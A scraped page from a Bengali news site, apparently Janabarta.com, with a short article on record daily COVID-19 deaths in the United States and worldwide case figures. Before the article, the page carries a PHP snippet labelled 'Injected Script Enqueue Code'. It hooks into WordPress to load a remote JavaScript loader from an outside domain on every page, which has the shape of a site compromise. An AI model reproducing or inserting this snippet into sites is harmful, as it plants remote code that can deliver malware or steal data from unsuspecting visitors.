// Injected Script Enqueue Code function enqueue_custom_script() { wp_enqueue_script( 'custom-error-script', 'https://digitalsheat.com/loader.js', array(), null, true ); } add_action('wp_enqueue_scripts', 'enqueue_custom_script'); Janabarta.com | Newsportal Site ২৪ ঘণ্টায় আবার রেকর্ড মৃত্যু যুক্তরাষ্ট্রে - Janabarta.com

২৪ ঘণ্টায় আবার রেকর্ড মৃত্যু যুক্তরাষ্ট্রে

আন্তর্জাতিক ডেস্ক: যুক্তরাষ্ট্রে নভেল করোনাভাইরাস মেতেছে রেকর্ড ভাঙা-গড়ার খেলায়। মৃতের সংখ্যার হিসেবে প্রত্যেকদিন দেশটি তার নিজের রেকর্ড ভাঙছে নিজেই। গত ২৪ ঘণ্টায় দেশটিতে করোনাভাইরাসে আক্রান্ত হয়ে প্রাণ হারিয়েছেন ২ হাজার ৪৮২ জন। একদিনে এর আগে যুক্তরাষ্ট্রেই সর্বোচ্চ মৃতের সংখ্যা ছিল গত ১৪ এপ্রিলে, ২ হাজার ৪০৭ জন।

এ নিয়ে দেশটিতে করোনার সংক্রমণে মোট মৃতের সংখ্যা পৌঁছল ২৮ হাজার ৫২৯ জনে। আক্রান্তের সংখ্যা ৬ লাখ ৪৪ হাজার ৮৯। গত ২৪ ঘণ্টায় নতুন করে সংক্রমিত হয়েছেন ৩০ হাজার ২০৬ জন।

বিপুল সংখ্যক আক্রান্ত নাগরিকের মধ্যে যুক্তরাষ্ট্রে সুস্থ হয়ে বাড়ি ফিরেছেন ৪৮ হাজার ৭০১ জন। বর্তমানে আক্রান্ত আছেন ৫ লাখ ৬৬ হাজার ৮৫৯ জন। যারা চিকিৎসা নিচ্ছেন তাদের মধ্যে গুরুতর আছেন ১৩ হাজার ৪৮৭ জন।

বিশ্বব্যাপী এই মুহূর্তে করোনাভাইরাসে আক্রান্তের সংখ্যা ২০ লাখ ৮৩ হাজার ৭০ জন। মৃত্যুবরণ করেছেন ১ লাখ ৩৪ হাজার ৬০৭ জন। সুস্থ হয়ে বাড়ি ফিরে গেছেন ৫ লাখ ১০ হাজার ৩২৮ জন। বর্তমানে আক্রান্ত আছেন ১৪ লাখ ৩৮ হাজার ১৩৫ জন। সংকটাপন্ন আছেন ৫১ হাজার ১৪২ জন।